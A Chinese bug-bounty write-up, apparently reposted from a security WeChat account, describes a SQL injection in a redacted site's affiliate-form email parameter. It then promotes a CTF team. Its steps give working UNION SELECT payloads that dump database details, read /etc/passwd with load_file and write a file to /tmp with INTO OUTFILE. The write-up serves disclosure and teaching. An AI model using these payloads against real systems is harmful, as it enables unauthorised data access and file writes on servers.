01
照常在网上注册为会员
02
然后重定向到POST,将所有表单信息都发送到
https://www.blablabla.com/svc/*****/form_affiliate。
选择它并发送到转发器。易受攻击的参数是email。
03
在请求框中,在“ email ”参数“ ”中输入此SQL命令,
‘ and 1=2unionallselectconcat_ws(0x3a,version(),user(),database())
然后单击Go(此命令将显示版本,用户和数据库名称)
04
结果显示在响应框,
“ 5.5.41-log:root@10.130。*。**:tp_cart ”上。
现在,尝试使用此加载文件命令
‘and 1=2 union all select load_file(‘/etc/passwd’)
05
将load file命令更改为outfile命令,在/ tmp '上创建一个文件
‘and1=2unionallselect'blablabla_bug_bounty_program'intooutfile'/tmp/blablabla'
该命令将blablabla_bug_bounty_program写入/ tmp目录中的blablabla文件中。
06
现在,再次使用加载文件来查看文件是否已创建,并且未使用此命令
‘ and 1=2 union all select load_file(‘/tmp/blablabla’)
并且创建成功!所以我得到了sql,并且还可以在服务器上创建文件。
你是否想要加入一个安全团队
拥有更好的学习氛围?
那就加入EDI安全(CTF小组),这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心。
我们诚招web,misc,re,pwn,crypto各个方向的师傅们,不论年龄、不论性别,EDI为大家提供一个共同学习,一同进步的平台。
我们在挖掘,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系我们的无剧师傅(带上自己的简历,简历内容包括自己的学习方向,学习经历等)。
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
本文始发于微信公众号(EDI安全):通过注入文件和外出文件进行SQL注入
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论